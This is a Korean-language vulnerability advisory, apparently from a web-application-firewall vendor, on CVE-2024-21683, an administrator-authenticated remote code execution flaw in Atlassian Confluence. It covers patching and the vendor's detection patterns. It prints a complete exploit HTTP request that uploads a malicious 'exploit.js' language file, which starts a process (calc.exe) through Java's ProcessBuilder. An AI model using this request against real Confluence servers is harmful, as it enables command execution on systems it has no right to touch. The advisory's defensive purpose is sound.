TA 팀이 “Atlassian Confluence 원격 코드 실행(CVE-2024-21683)”을 분석하여 작성한 취약점 보고서
Atlassian Confluence 원격 코드 실행
해당 취약점은 Confluence 데이터 센터 및 서버의 RCE 취약점으로, '혼란 관리자' 권한을 가진 사용자가 일반 구성 - 구성 코드 매크로 설정의 '새 언어 추가' 기능을 통해 악성 JS 파일을 업로드하여 악성 명령을 실행할 수 있도록 허용하는 취약점입니다.
이 취약점은 2024년 3월 Atlasian에서 발표한 보안 업데이트를 적용하면 해결할 수 있으며, 당사의 AIWAF 제품에서는 관련 패턴을 통해 정상적으로 탐지됩니다.
1. 개요
Atlassian에서 제공하는 Confluence는 팀 단위 공동 작업에 필요한 옵션들을 제공하는 솔루션으로, 해당 솔루션에서 발생한 Remote Code Execution 취약점인 CVE-2024-21683에 대한 분석을 진행하였습니다.
출처 : https://www.helpnetsecurity.com/2024/06/03/cve-2024-21683-poc/
2. 공격 유형
해당 취약점은 Confluence Data Center 및 Server에서 발생한 RCE 취약점으로, 해당 취약점에 대한 Exploit 정보가 Github에 공개되면서 많은 주목을 받게 되었습니다.
이 취약점은 General Configuration - Configure Code Macro 설정의 "새로운 언어 추가" 기능을 선택하면 임의 파일을 업로드 할 수 있는데, 이때 악성코드가 담긴 JS 파일을 업로드하여 실행하도록 유도합니다.
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"
[ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"
RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--
다만 해당 취약점의 경우 "Confluence Administrator" 권한을 지닌 사용자 계정을 통해서만 해당 설정에 접근할 수 있어 높은 권한을 가진 계정이 필요하다는 점 때문에 해당 취약점을 활용하기에는 상대적으로 어려우나, 해당 계정을 얻을 수만 있다면 굉장히 쉽게 악성코드를 실행할 수 있습니다.
3. 대응 방안
Atlassian에서는 2024년 3월 보안 업데이트에서 해당 취약점에 대한 패치 버전을 발표하였기 때문에 Confluence를 최신 버전으로 업데이트 하여 해당 취약점에 대해 대응할 수 있습니다.
저희 AIWAF 제품에서는 java.lang. 과 같은 구문을 탐지하는 851: Apache Struts Framework Vulnerability 패턴이나 JS 파일 업로드를 탐지하는 724: Upload File Vulnerability (Script) 패턴에서 정상 탐지되고 있으나, 해당 공격 구문에 대한 추가적인 패턴이 필요한지에 대한 추가 분석 단계에 있습니다.
4. 결론
Altassian Confluence에서 발생한 RCE 공격의 경우 일정 권한 이상의 권한을 지닌 계정이 필요하다는 제약이 있으나 해당 계정을 보유하고 있다면 간단한 방법으로 손쉽게 악용이 가능한 취약점이며, 많은 기업에서 해당 솔루션을 사용하고 있어 그 영향도가 높아 빠르게 최신 버전으로 업데이트가 필요합니다.
저희 AIWAF 제품에서는 Altassian Confluence에서 발생하는 취약점들에 대해 패턴을 개발하여 대응하고 있으며, 앞으로도 발견되는 관련 취약점들에 대해서도 신속하게 대응할 예정입니다.
